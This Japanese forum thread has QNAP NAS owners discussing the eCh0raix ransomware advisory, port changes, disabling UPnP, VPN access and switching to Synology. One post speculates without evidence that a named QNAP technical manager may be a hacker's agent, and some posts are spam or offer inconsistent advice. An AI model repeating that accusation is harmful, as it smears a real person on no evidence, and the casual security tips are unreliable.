2021/05/13(木) 21:09:13.78ID:uLbjj06H0 金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
838不明なデバイスさん (ワッチョイ ca8b-C7Xb)
2021/05/13(木) 21:14:41.08ID:AClZ+y5V0 >>835
良かった。確認したら、2/3の時点で対応済みのやつだった。
やっぱ基本的に最新版に更新した方が良さそうだな
https://www.qnap.com/en/app_releasenotes/list.php?app_choose=MalwareRemover
良かった。確認したら、2/3の時点で対応済みのやつだった。
やっぱ基本的に最新版に更新した方が良さそうだな
https://www.qnap.com/en/app_releasenotes/list.php?app_choose=MalwareRemover
839不明なデバイスさん (ワッチョイ 6a79-EEf/)
2021/05/13(木) 21:22:45.62ID:TWmkQO5M0 QNAPが静止する日
840不明なデバイスさん (ワッチョイ e356-LSpj)
2021/05/13(木) 21:33:13.56ID:bIH9MQXt0 >>835
よりによってマルウェアリームーバーに脆弱性ってどういうことなの…
よりによってマルウェアリームーバーに脆弱性ってどういうことなの…
841不明なデバイスさん (ワッチョイ ca07-jjtP)
2021/05/13(木) 22:02:32.56ID:PAVo/Wj00 シャレにならんw
てかQNAPのプログラマーは本物の無能か?
てかQNAPのプログラマーは本物の無能か?
842不明なデバイスさん (ワッチョイ e6ab-kzyh)
2021/05/13(木) 22:09:19.08ID:1i8IBZLU0 うーんこれは真面目に乗り換え考えるかなあ
でも乗り換え先が分からん
でも乗り換え先が分からん
843不明なデバイスさん (スププ Sd8a-nm5w)
2021/05/13(木) 22:21:57.28ID:mOzNKxNed 台湾て親日国だから勘違いしがちだけど、本質的には中国だからな
信用した方にも問題がある
信用した方にも問題がある
844不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/13(木) 22:51:47.76ID:PTmfY6Mn0 天安門事件
845不明なデバイスさん (ワッチョイ d336-NPDn)
2021/05/13(木) 23:22:57.59ID:c/ONsWlj0 警備員に巡回させてたら、そいつの手引きで泥棒を招き入れてたくらいお粗末な話だね
846不明なデバイスさん (JP 0H5a-gUNg)
2021/05/13(木) 23:39:24.28ID:Ije3pE8SH847不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/14(金) 01:26:30.39ID:bMe2STe+0 10GbEカードを追加して10GbEでリンクして転送速度的にもこんなものかと思ってたら
ケーブルが細いのでよく見たらカテゴリ5Eだったわ、ご注意を
ケーブルが細いのでよく見たらカテゴリ5Eだったわ、ご注意を
848不明なデバイスさん (ワッチョイ 9379-gSvD)
2021/05/14(金) 08:17:29.34ID:JKc72JI60849不明なデバイスさん (アウアウウー Sa31-XTG6)
2021/05/14(金) 09:14:46.63ID:FkxX5EVta どこのサイト?
Synologyはメディアに金沢山払って宣伝してるからな
雑誌やWebのNAS特集とかは大抵Synologyがスポンサーだから
Synologyはメディアに金沢山払って宣伝してるからな
雑誌やWebのNAS特集とかは大抵Synologyがスポンサーだから
850新型コロナ、後遺症でハゲるぞ (ワッチョイ c3c7-20J5)
2021/05/14(金) 09:45:07.39ID:vDM45uTW0 >>849
も~多過ぎる
雑誌系から個人ブログ風の所まで。
個人系で中立だったの「自作とゲー〜」位(組み込み系薄っぺらいとも言えるが)
オレ、NETGEAR・QNAP・Thecusしか使った事無いから(牛・玄箱は黒歴史)偉そうには言えんけどね。
も~多過ぎる
雑誌系から個人ブログ風の所まで。
個人系で中立だったの「自作とゲー〜」位(組み込み系薄っぺらいとも言えるが)
オレ、NETGEAR・QNAP・Thecusしか使った事無いから(牛・玄箱は黒歴史)偉そうには言えんけどね。
851不明なデバイスさん (ワッチョイ c3c7-20J5)
2021/05/14(金) 10:06:10.30ID:vDM45uTW0 つか、QuTS heroの使い心地聞いてみたい。
873Aと古いNAS入れ替えたから、QTSかQuTS heroで迷っている。
HDDかき集めてバックアップとったから、復元地獄。出来ればOS決めておきたい。
(He抜けの赤にバックアップ取った。
873Aと古いNAS入れ替えたから、QTSかQuTS heroで迷っている。
HDDかき集めてバックアップとったから、復元地獄。出来ればOS決めておきたい。
(He抜けの赤にバックアップ取った。
852不明なデバイスさん (アウアウクー MM23-XuO6)
2021/05/14(金) 10:19:56.49ID:vIth+TeBM 大変なことになってるみたいだけど、家のルーター経由でパソコンからと、外出先からスマホでアクセスするだけの設定でもあかんの?
853不明なデバイスさん (ワッチョイ 2b8b-S5yT)
2021/05/14(金) 10:34:37.92ID:siBvraVi0855不明なデバイスさん (ワッチョイ 9b02-1XqH)
2021/05/14(金) 11:33:00.91ID:HjTi7G0c0 UPnPポートフォワーディングは無効にしてVPNでアクセスすればいいということ?
856不明なデバイスさん (JP 0Hff-TVsO)
2021/05/14(金) 11:56:34.89ID:9LJ4+wVsH857不明なデバイスさん (アウアウクー MM23-XuO6)
2021/05/14(金) 12:19:54.29ID:vIth+TeBM 852だけどありがと〜
VPNかますのめんどくせー
外出先からアクセスしないほうがいいNASなのね
VPNかますのめんどくせー
外出先からアクセスしないほうがいいNASなのね
859不明なデバイスさん (テテンテンテン MM17-qkrj)
2021/05/14(金) 17:23:28.02ID:OvmXB0liM860不明なデバイスさん (ワッチョイ d163-YOrY)
2021/05/14(金) 17:38:56.58ID:k7gzT+Kr0 QBeltはあかんのか?
861不明なデバイスさん (ワッチョイ b19b-u+PU)
2021/05/14(金) 18:06:03.26ID:W5CpDAkn0 >>761
続きなんだけど、これだとHTTPの通信だけしかログが記録されなかった
HTTPS(SSL)通信のログをとるには/etc/config/apache/extra/apache-ssl.confを開いて
</VirtualHost>の上の行にCustomLogの行を(ファイル名にsslか何かを付けて)挿入すればいいっぽいんだが
これだとWEBサーバーを再起動すると新しいのに書き換えられちゃうからダメ、なので
/etc/default_config/apache-ssl.conf
を書き換えてWEBサーバーを再起動すればOK…
なんだがこっちはNASを再起動すると元に戻る系ファイルだった
autorun.shで再起動後に書き換える的なスクリプト書かないとダメっぽいけど>>761の通りCLIはちんぷんかんぷんなんで諦めた
というかWEBサーバーとして使えるけどアクセスログはみえませーん!ってどうなんですかQNAPさん…
続きなんだけど、これだとHTTPの通信だけしかログが記録されなかった
HTTPS(SSL)通信のログをとるには/etc/config/apache/extra/apache-ssl.confを開いて
</VirtualHost>の上の行にCustomLogの行を(ファイル名にsslか何かを付けて)挿入すればいいっぽいんだが
これだとWEBサーバーを再起動すると新しいのに書き換えられちゃうからダメ、なので
/etc/default_config/apache-ssl.conf
を書き換えてWEBサーバーを再起動すればOK…
なんだがこっちはNASを再起動すると元に戻る系ファイルだった
autorun.shで再起動後に書き換える的なスクリプト書かないとダメっぽいけど>>761の通りCLIはちんぷんかんぷんなんで諦めた
というかWEBサーバーとして使えるけどアクセスログはみえませーん!ってどうなんですかQNAPさん…
862不明なデバイスさん (ワッチョイ 2b8b-S5yT)
2021/05/14(金) 18:32:26.29ID:siBvraVi0 >>860
TailScaleいいよ。WireGuardベースだから速度も速いし、各種OSにクライアントあるし、Webから殆ど設定できる。
https://internet.watch.impress.co.jp/docs/column/shimizu/1313903.html
自分専用でもいいし、ACLも設定できるから公開したいそれぞれに公開するサービスを制限できる。
サブネット設定してLAN内へのアクセスしたり、ゲートウェイ設定とかもできる。
これからの時代は基本的にVPNとかSD-WANベースにした方が安全かもねー
やられてからでは遅い。後悔先に立たず。平穏は自分で守るものだよ。
TailScaleいいよ。WireGuardベースだから速度も速いし、各種OSにクライアントあるし、Webから殆ど設定できる。
https://internet.watch.impress.co.jp/docs/column/shimizu/1313903.html
自分専用でもいいし、ACLも設定できるから公開したいそれぞれに公開するサービスを制限できる。
サブネット設定してLAN内へのアクセスしたり、ゲートウェイ設定とかもできる。
これからの時代は基本的にVPNとかSD-WANベースにした方が安全かもねー
やられてからでは遅い。後悔先に立たず。平穏は自分で守るものだよ。
863不明なデバイスさん (アウアウウー Sa31-XTG6)
2021/05/14(金) 18:44:43.23ID:OugBsQL7a >>850
確かにSynology推しのサイト多いよね
お金もらってんだろうなって感じのも多いw
笑ったのはNAS比較の記事なのにQNAPが無くて、Synologyと国産NASの比較みたいなやつ
でもテラマスターとか入ってるのw
露骨なQNAP外しでお薦めはSynologyって記事有った
確かにSynology推しのサイト多いよね
お金もらってんだろうなって感じのも多いw
笑ったのはNAS比較の記事なのにQNAPが無くて、Synologyと国産NASの比較みたいなやつ
でもテラマスターとか入ってるのw
露骨なQNAP外しでお薦めはSynologyって記事有った
864不明なデバイスさん (アウアウウー Sa31-XTG6)
2021/05/14(金) 18:48:53.59ID:OugBsQL7a 探したらまだ有った。去年の記事だな。
https://the360.life/U1301.doit?id=14664
露骨なQNAP外しはSynologyの指示か
家電批評の記者が書いてるけど、結局あの雑誌もスポンサーついてる商品推しの提灯記事ばっかりなんだな
https://the360.life/U1301.doit?id=14664
露骨なQNAP外しはSynologyの指示か
家電批評の記者が書いてるけど、結局あの雑誌もスポンサーついてる商品推しの提灯記事ばっかりなんだな
865不明なデバイスさん (ワッチョイ d163-YOrY)
2021/05/14(金) 19:12:50.23ID:k7gzT+Kr0 >>862
ありがとう!じっくり読み込んでみる
ありがとう!じっくり読み込んでみる
866不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/14(金) 19:59:39.69ID:bMe2STe+0 the360.lifeっでステマ専門みたいなサイトじゃないか
867不明なデバイスさん (ワッチョイ f773-OEc3)
2021/05/14(金) 20:04:30.86ID:oFwfZDe00 シノが宣伝に金掛けてるのはそうだろうけどQNAP最高!シノ糞!ってのが全然無いところを見るにシノでみんな満足してるんだろうなと
868不明なデバイスさん (ワッチョイ 293d-fy9k)
2021/05/14(金) 20:08:59.62ID:LMTgScBL0 米国企業がランサムウェアの身代金に500万ドル払ったらしいな。
360.lifeの出版社は評価だけは真面目にやるよ。
たまに土俵に乗らない製品があったり評価軸の設定が怪しいけど白を黒とは言わないタイプのステマ。
360.lifeの出版社は評価だけは真面目にやるよ。
たまに土俵に乗らない製品があったり評価軸の設定が怪しいけど白を黒とは言わないタイプのステマ。
869不明なデバイスさん (ワッチョイ 9f9b-Pdl0)
2021/05/14(金) 20:26:38.97ID:+c6DSW700 外部からの接続を防ぐには
UPnPの無効化
IPv6の無効化
ほかにすべきことってありますか?
UPnPの無効化
IPv6の無効化
ほかにすべきことってありますか?
870不明なデバイスさん (ワッチョイ 1307-Adon)
2021/05/14(金) 20:28:51.25ID:MeOXKVg10 >>868
この手の身代金犯罪は、南米の誘拐組織なんかもそうだけど本当にビジネスとしてやってるからね
言われた通りのカネさえ払えば何の被害も受けなかったり、人質もかすり傷一つなく返されたりする
でもぐずぐずしたり金をケチったりすると情報がネットに晒されたり指が1本ずつ送られてきたりするw
この手の身代金犯罪は、南米の誘拐組織なんかもそうだけど本当にビジネスとしてやってるからね
言われた通りのカネさえ払えば何の被害も受けなかったり、人質もかすり傷一つなく返されたりする
でもぐずぐずしたり金をケチったりすると情報がネットに晒されたり指が1本ずつ送られてきたりするw
871不明なデバイスさん (ワッチョイ 737c-2GXj)
2021/05/14(金) 20:53:47.00ID:VsbmxuG/0 社会の闇に詳しいおじさん登場で草
872不明なデバイスさん (ワッチョイ f101-E1vk)
2021/05/14(金) 21:13:32.98ID:H7/Tii2T0 >>867
QNAP買ったもののまともに運用できずランサムで騒いでる層もいるんだからどっこいやで
QNAP買ったもののまともに運用できずランサムで騒いでる層もいるんだからどっこいやで
874不明なデバイスさん (ワッチョイ 2910-cwd7)
2021/05/14(金) 22:15:35.36ID:ah6p0q2B0 外部からアクセス必要なQNAPのサービスはドコモスマホからだけなのでファイアウォールにfrom docomoのみokルールぶっこんだわ
ttps://www.nttdocomo.co.jp/service/developer/smart_phone/spmode/index.html
こんだけセグメントあってCLIだから良かったけどGUIなら心折れそう
ttps://www.nttdocomo.co.jp/service/developer/smart_phone/spmode/index.html
こんだけセグメントあってCLIだから良かったけどGUIなら心折れそう
875不明なデバイスさん (ワッチョイ e1ca-7W/5)
2021/05/14(金) 23:07:14.55ID:H5gKCd0O0 本日(5/14)公開の最新の脆弱性
Vulnerability in Roon Server
Release date: May 14, 2021
Security ID: QSA-21-17
Affected products: QNAP NAS running Roon Server
Status: Investigating
eCh0raix Ransomware
Release date: May 14, 2021
Security ID: QSA-21-18
Affected products: QNAP NAS devices
Status: Investigating
Vulnerability in Roon Server
Release date: May 14, 2021
Security ID: QSA-21-17
Affected products: QNAP NAS running Roon Server
Status: Investigating
eCh0raix Ransomware
Release date: May 14, 2021
Security ID: QSA-21-18
Affected products: QNAP NAS devices
Status: Investigating
876不明なデバイスさん (ワッチョイ e1ca-7W/5)
2021/05/14(金) 23:15:54.51ID:H5gKCd0O0 新しいランサムウェアeCh0raixが見つかりました。
eCh0raixはネット上でアクセス可能なQNAPデバイスに対してブルースフォースアタック
を仕掛けることで、内部に侵入し、ファイルを暗号化してしまいます。
このランサムウェアは現在、調査中で修正版の提供はありません。
対策としては、
1) ウィークパスワードの使用は中止してください。
2) IPアクセス制御で攻撃元からのアクセスを遮断してください。
3) デフォルトの433と8080のポート番号の使用を中止して別の番号に変更してください。
www.qnap.com/en/security-advisory/QSA-21-18
eCh0raixはネット上でアクセス可能なQNAPデバイスに対してブルースフォースアタック
を仕掛けることで、内部に侵入し、ファイルを暗号化してしまいます。
このランサムウェアは現在、調査中で修正版の提供はありません。
対策としては、
1) ウィークパスワードの使用は中止してください。
2) IPアクセス制御で攻撃元からのアクセスを遮断してください。
3) デフォルトの433と8080のポート番号の使用を中止して別の番号に変更してください。
www.qnap.com/en/security-advisory/QSA-21-18
877不明なデバイスさん (ワッチョイ 5310-6ZOZ)
2021/05/14(金) 23:24:06.20ID:p7rW2vWg0 ブルースフォースアタックw
878不明なデバイスさん (ワッチョイ 5b10-92wq)
2021/05/14(金) 23:38:34.56ID:P+u7MgWL0 憂鬱にさせて侵入するんやな…
879不明なデバイスさん (ワッチョイ 61f1-Adon)
2021/05/15(土) 00:24:30.74ID:UXAL1Vr00 だめなのは443だよね?
880不明なデバイスさん (ワッチョイ 8902-gSvD)
2021/05/15(土) 00:44:19.40ID:x5DW8UBU0 >>867
両方使ったことのあるユーザーなんてそんなに多くないだろうしな
それにどっちもそこそこ優秀だから、一方をクソとかいう事は無いけどな
Synoも国産NASと比べたら全然良かったけど、QNAPを知ってしまうとSynoには戻れない
なんか例えが上手くないかもだけど、MazdaユーザーがSUBARUに乗り換えたらスバリストになってしまったみたいな感じ
どっちも良いメーカーなんだが、自分が求めているものに近いものを提供してくれるのはQNAP
相手貶めるようなカキコしてるのは強烈な信者か関係者だろ
いろいろ騒がしいけど、脆弱性はこの際徹底的に洗い出してセキュリティを強化してほしいっすね
両方使ったことのあるユーザーなんてそんなに多くないだろうしな
それにどっちもそこそこ優秀だから、一方をクソとかいう事は無いけどな
Synoも国産NASと比べたら全然良かったけど、QNAPを知ってしまうとSynoには戻れない
なんか例えが上手くないかもだけど、MazdaユーザーがSUBARUに乗り換えたらスバリストになってしまったみたいな感じ
どっちも良いメーカーなんだが、自分が求めているものに近いものを提供してくれるのはQNAP
相手貶めるようなカキコしてるのは強烈な信者か関係者だろ
いろいろ騒がしいけど、脆弱性はこの際徹底的に洗い出してセキュリティを強化してほしいっすね
882不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/15(土) 01:02:50.35ID:YI2c09390 隣の芝は青いというからなぁ、QNAPの前はNETGEAR使ってたけど
使い勝手にはそれぞれ違いがある
使い勝手にはそれぞれ違いがある
883不明なデバイスさん (ワッチョイ f156-9YXK)
2021/05/15(土) 09:42:36.43ID:xMFTq8Vw0 synoはiPhoneに似ててQNAPは泥って感じがしてる
好みというか思想が違うんからあうあわないはあるとおもう
好みというか思想が違うんからあうあわないはあるとおもう
884不明なデバイスさん (ワッチョイ e982-sort)
2021/05/15(土) 09:45:17.32ID:Pjcg7hwO0 金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ
885不明なデバイスさん (アウアウクー MM23-lU/s)
2021/05/15(土) 09:56:30.18ID:YNG1zVeyM 8080のポート変えるってどゆこと?
たとえルーターのUPNPやポートマッピングすら開けてなくて、単にローカルからQNAPの操作画面に入るだけであってもポート変更すべきなん?
たとえルーターのUPNPやポートマッピングすら開けてなくて、単にローカルからQNAPの操作画面に入るだけであってもポート変更すべきなん?
886不明なデバイスさん (ワッチョイ f156-9YXK)
2021/05/15(土) 10:02:02.88ID:xMFTq8Vw0 攻撃者がポートスキャンする僅かな手間が減るだけだからあんま意味ないと思うけどなあ
887不明なデバイスさん (JP 0Hff-u+PU)
2021/05/15(土) 11:04:06.40ID:wrU5DzLvH adminを無効にしろ、パスワードを複雑にしろ、ポートを変えろ、
お決まりの定型文をコピペしているだけにしか見えない
QNAPのセキュリティ部門は機能しているのか
今回の件で外部に協力してもらってるらしいが、そもそもセキュリティ部門はないのか
Walter Shaoなる人物がテクニカルマネージャーをやってた時点でアプリ開発はかなり脆弱にみえる
過失なのか故意なのか、はたまたハッカーの手先なのか
QNAPはWalter Shaoが何者なのか説明しなければならない
お決まりの定型文をコピペしているだけにしか見えない
QNAPのセキュリティ部門は機能しているのか
今回の件で外部に協力してもらってるらしいが、そもそもセキュリティ部門はないのか
Walter Shaoなる人物がテクニカルマネージャーをやってた時点でアプリ開発はかなり脆弱にみえる
過失なのか故意なのか、はたまたハッカーの手先なのか
QNAPはWalter Shaoが何者なのか説明しなければならない
888不明なデバイスさん (アウアウエー Sa93-fy9k)
2021/05/15(土) 12:32:35.42ID:JyoiQPA3a889不明なデバイスさん (ワッチョイ 5b10-92wq)
2021/05/15(土) 12:47:24.95ID:nz8wLJOa0 ずっと常駐してる対立煽り屋だから放置で
890不明なデバイスさん (ワッチョイ ffbb-Frvi)
2021/05/15(土) 13:14:03.85ID:NACQkfca0 >>887
ソースコードにパスワードがそのまま書かれていた奴か
製品にそんな事するのはちょっとありえないな
これってgithubにawsのアクセスキーあげてしまうくらいの失態じゃないのか
他にもその様なイージーな手抜きがあちこちにありそうで怖いな、それらそのままセキュリティホールだからね
もうQNAPはハッカー達から簡単に陥落できるぞと目をつけられてるだろう
対策はNAS自体を他メーカーにすぐに変更するか、それが無理ならインターネットから完全に切り離してローカル限定にした方が良い
ソースコードにパスワードがそのまま書かれていた奴か
製品にそんな事するのはちょっとありえないな
これってgithubにawsのアクセスキーあげてしまうくらいの失態じゃないのか
他にもその様なイージーな手抜きがあちこちにありそうで怖いな、それらそのままセキュリティホールだからね
もうQNAPはハッカー達から簡単に陥落できるぞと目をつけられてるだろう
対策はNAS自体を他メーカーにすぐに変更するか、それが無理ならインターネットから完全に切り離してローカル限定にした方が良い
891不明なデバイスさん (ワッチョイ ffbb-Frvi)
2021/05/15(土) 13:34:38.81ID:NACQkfca0 >>885
8080から変更する事自体は意味がある
攻撃者は8080に反応があれば、それはQNAPじゃねと思って攻撃してくる
(攻撃者は8080はQNAPでデフォルトで使われていると知っているのだから)
仮に47638番に変更したら、ポートスキャンに反応があってもそれがQNAPかどうかは色々試行してみないとわからない
そんな手間のかかる事をするくらいなら、ポートスキャンなど行わずに手当たり次第に8080に投げつけて反応があったIPから攻撃した方が手っ取り早い
狙う側からしても、この状況下でもデフォルトから変えていないユーザーは、イコール危機感薄いか、何も知らないド素人の可能性が高い!カモだ!
と考える(実際そうだが)
8080から変更する事自体は意味がある
攻撃者は8080に反応があれば、それはQNAPじゃねと思って攻撃してくる
(攻撃者は8080はQNAPでデフォルトで使われていると知っているのだから)
仮に47638番に変更したら、ポートスキャンに反応があってもそれがQNAPかどうかは色々試行してみないとわからない
そんな手間のかかる事をするくらいなら、ポートスキャンなど行わずに手当たり次第に8080に投げつけて反応があったIPから攻撃した方が手っ取り早い
狙う側からしても、この状況下でもデフォルトから変えていないユーザーは、イコール危機感薄いか、何も知らないド素人の可能性が高い!カモだ!
と考える(実際そうだが)
892不明なデバイスさん (ワッチョイ d732-Ew1A)
2021/05/15(土) 13:45:03.69ID:meFsCJoa0 そもそも8080とか他でも使われるポート番号だからスキャン受けやすいわな
893不明なデバイスさん (ワッチョイ ffbb-Frvi)
2021/05/15(土) 13:55:17.71ID:NACQkfca0894不明なデバイスさん (アウアウエー Sa93-y/av)
2021/05/15(土) 13:55:24.24ID:/69GXuAja ポート変更するなら、80はルータか何かで塞いでおかないと効果が薄れるんじゃない?
リダイレクト機能があるでしょ
リダイレクト機能があるでしょ
895不明なデバイスさん (スップ Sdb7-E1vk)
2021/05/15(土) 14:04:20.14ID:NQaERJIld ここの連中はウェルノウンポートって言葉を知らんのか
896不明なデバイスさん (テテンテンテン MM17-qkrj)
2021/05/15(土) 14:42:33.56ID:pqW+6S8tM 上の5桁勧めてる人は知ってるでしょ
897不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/15(土) 16:36:19.62ID:YI2c09390 ポートはデフォルトから交換しておいた方がいいと思うけど
例えUPnPをOFFにしたとしても、ルータを初期化したリ
交換したら元に戻ってしまうし
基本はすべてを塞ぎ必要なものを開けていくこと
HBS3のアップデートが来てるからチェックしようね
例えUPnPをOFFにしたとしても、ルータを初期化したリ
交換したら元に戻ってしまうし
基本はすべてを塞ぎ必要なものを開けていくこと
HBS3のアップデートが来てるからチェックしようね
898不明なデバイスさん (ワッチョイ 0f5f-Adon)
2021/05/15(土) 18:00:50.76ID:QFQzYwv40 >>897
?ルータの入れ替えで、QNAPのUPnP OFFが元に戻るって、なんだそれ?
?ルータの入れ替えで、QNAPのUPnP OFFが元に戻るって、なんだそれ?
899不明なデバイスさん (ワッチョイ 6b81-sort)
2021/05/15(土) 18:06:23.00ID:4B3T/UNu0 UPnPの有無ってルータ上で設定するんじゃないの
900不明なデバイスさん (ワッチョイ ff00-TLNx)
2021/05/15(土) 18:09:18.26ID:fTFIDbaq0 真っ先に狙われるのは探す手間も省けてセキュリティ意識も低そうなmyQnapCloudで公開設定にしてるやつ
そして絶対の安全というものは無いが、やられる可能性を少しでも減らす為にもやれることはやっておけという話
そして絶対の安全というものは無いが、やられる可能性を少しでも減らす為にもやれることはやっておけという話
901不明なデバイスさん (ワッチョイ 015f-vH/O)
2021/05/15(土) 18:46:59.42ID:n8RuwwpG0902不明なデバイスさん (ワッチョイ e36d-/gQn)
2021/05/15(土) 21:22:28.46ID:HkgsWWSQ0 QNAP窓から投げてSynologyにすればええだけやん
903不明なデバイスさん (ワッチョイ 4315-ZHuX)
2021/05/15(土) 21:50:21.19ID:ocHWkJyh0 RAID5のQnapからSynologyに移行する場合、またHDD4台とNAS本体買ってコピーしなければならんの?
もうQnapやめたいけど金かかりすぎてきついんだが
もうQnapやめたいけど金かかりすぎてきついんだが
905不明なデバイスさん (ワッチョイ 6b81-sort)
2021/05/15(土) 21:59:14.61ID:4B3T/UNu0906不明なデバイスさん (ワッチョイ bfbd-ctj2)
2021/05/15(土) 22:38:39.95ID:A4U5Gekz0907不明なデバイスさん (ワッチョイ f101-E1vk)
2021/05/15(土) 22:43:22.33ID:JMo22i1k0 ネットワークの基本的な知識を身につけろや
908不明なデバイスさん (ワッチョイ e1ca-7W/5)
2021/05/15(土) 22:52:54.43ID:62sz4S/D0 >>906
通常、アタックをかけてくる場合は、IPアドレス順に8080と443のポートが開いている
かをチェックする。したがって、1つずらして8081に、444は使われてるかもしれないの
で4430とかにすれば初心者の攻撃は凌げる。
ただし玄人だったら、相手がQNAPだとわかったらポートスキャンをかけてオープンな
ポートがないが全部チェックする。こういう相手にあたったら番号を変えても勝ち目は
ない。
通常、アタックをかけてくる場合は、IPアドレス順に8080と443のポートが開いている
かをチェックする。したがって、1つずらして8081に、444は使われてるかもしれないの
で4430とかにすれば初心者の攻撃は凌げる。
ただし玄人だったら、相手がQNAPだとわかったらポートスキャンをかけてオープンな
ポートがないが全部チェックする。こういう相手にあたったら番号を変えても勝ち目は
ない。
909不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/15(土) 23:38:25.27ID:YI2c09390 >>906
動的・プライベート ポート番号 (49152-65535) というのがあるからこの範囲で適当な番号を選べばいいよ
既に使われている場合はエラーが出るから大丈夫
443とか8080とかの数字は含まない方がいいと思うけどね
動的・プライベート ポート番号 (49152-65535) というのがあるからこの範囲で適当な番号を選べばいいよ
既に使われている場合はエラーが出るから大丈夫
443とか8080とかの数字は含まない方がいいと思うけどね
910906 (ワッチョイ bfbd-ctj2)
2021/05/15(土) 23:42:03.60ID:A4U5Gekz0 仕事等で使うならそれなりに知識無ければまずいけど、自分なんかは写真や動画の保存場所と、スマホやタブレットでそれを気軽に見たいってレベルで、そんな人も結構いるんのじゃないかな。
まあ、家の外では一切見られない設定にしてしまうのが1番なのだろうけど。
まあ、家の外では一切見られない設定にしてしまうのが1番なのだろうけど。
911906 (ワッチョイ bfbd-ctj2)
2021/05/15(土) 23:45:01.08ID:A4U5Gekz0912不明なデバイスさん (ワッチョイ dfad-9scZ)
2021/05/16(日) 00:20:29.11ID:BEJMvCfw0 基本は>>909さんの挙げてる範囲にすれば大丈夫なんだけど
気が向けば上のほうの5ケタを選ぶときでも「52869/tcp」みたいにぐぐると
謎の界隈で人気かどうかがある程度わかると思うよ
不人気ポートをさがそう
気が向けば上のほうの5ケタを選ぶときでも「52869/tcp」みたいにぐぐると
謎の界隈で人気かどうかがある程度わかると思うよ
不人気ポートをさがそう
913不明なデバイスさん (ワッチョイ ffbb-zmmS)
2021/05/16(日) 11:20:42.82ID:tC5rlVJ10 qnapでマルチメディアサービスoffなら
upnpはoffになってると思っていい?
upnpはoffになってると思っていい?
914不明なデバイスさん (ワッチョイ f302-v+Lc)
2021/05/16(日) 11:30:24.95ID:+TElO4j/0 >>910
家の外では一切見れない設定を一発でできればユーザの間口拡がるかも
家の外では一切見れない設定を一発でできればユーザの間口拡がるかも
915不明なデバイスさん (ワッチョイ ab68-f+Nk)
2021/05/16(日) 11:38:12.33ID:tOSUmaus0 >>914
qnapのデフォルトゲートウェイを127.0.0.1にでもすりゃ実現できるやんw
qnapのデフォルトゲートウェイを127.0.0.1にでもすりゃ実現できるやんw
916不明なデバイスさん (ワッチョイ 0f5f-Adon)
2021/05/16(日) 11:53:22.43ID:W+6pDBoz0 >>913
myqnapcloud見たらいいのになんでそんな面倒くさい考え方するの?
myqnapcloud見たらいいのになんでそんな面倒くさい考え方するの?
917不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/16(日) 12:09:32.44ID:q4JSWebW0918不明なデバイスさん (ワッチョイ 5310-sort)
2021/05/16(日) 15:10:56.81ID:AI5dZQhM0 そもそもルータでUPnP有効にしなければNAS側でいくら設定してもUPnP使えないようね
8080使いたくなかったらhttpsのみの接続にすればいいし
ポートスキャンかけてオープンな〜もUPnP使ってなかったら自分でルータでポートフォワーディング(意図的にポート開放)しているってことだし、やめればいいだけじゃないのw
admin無効も弱パスワードでなければ意味があるとは思えないな
ご丁寧にadmin使うのではなく、たいがい脆弱性ついた権限昇格で侵入されるもんでしょ
QNAPから移行したければ勝手にすればいいがバックアップのないNAS単体の運用なんていずれデータ飛ばすよ
RAID5でリビルド中に失敗したらどうすんの?
今回やられた連中ってルータとNASの設定の合わせ技でやられたと思うよ
あれこれ設定確認したかったらきちんと公式サポート受けなよ
8080使いたくなかったらhttpsのみの接続にすればいいし
ポートスキャンかけてオープンな〜もUPnP使ってなかったら自分でルータでポートフォワーディング(意図的にポート開放)しているってことだし、やめればいいだけじゃないのw
admin無効も弱パスワードでなければ意味があるとは思えないな
ご丁寧にadmin使うのではなく、たいがい脆弱性ついた権限昇格で侵入されるもんでしょ
QNAPから移行したければ勝手にすればいいがバックアップのないNAS単体の運用なんていずれデータ飛ばすよ
RAID5でリビルド中に失敗したらどうすんの?
今回やられた連中ってルータとNASの設定の合わせ技でやられたと思うよ
あれこれ設定確認したかったらきちんと公式サポート受けなよ
919不明なデバイスさん (ワッチョイ 9379-gSvD)
2021/05/16(日) 19:15:33.37ID:azjtCdFH0 QuTS hero使ってみた(TS-873A)。
正直、管理がよくなっているとは思う。コレ重要。
だけど、バックアップ用エンクロージャが(TL-D800C)認識出来なかったり(ファイルシステム違うからなぁ)で、システム元通りにするのが地獄。
QTSも階層化が魅力だし...個人・小規模用途なら、今まで通りQTSなのかなぁ
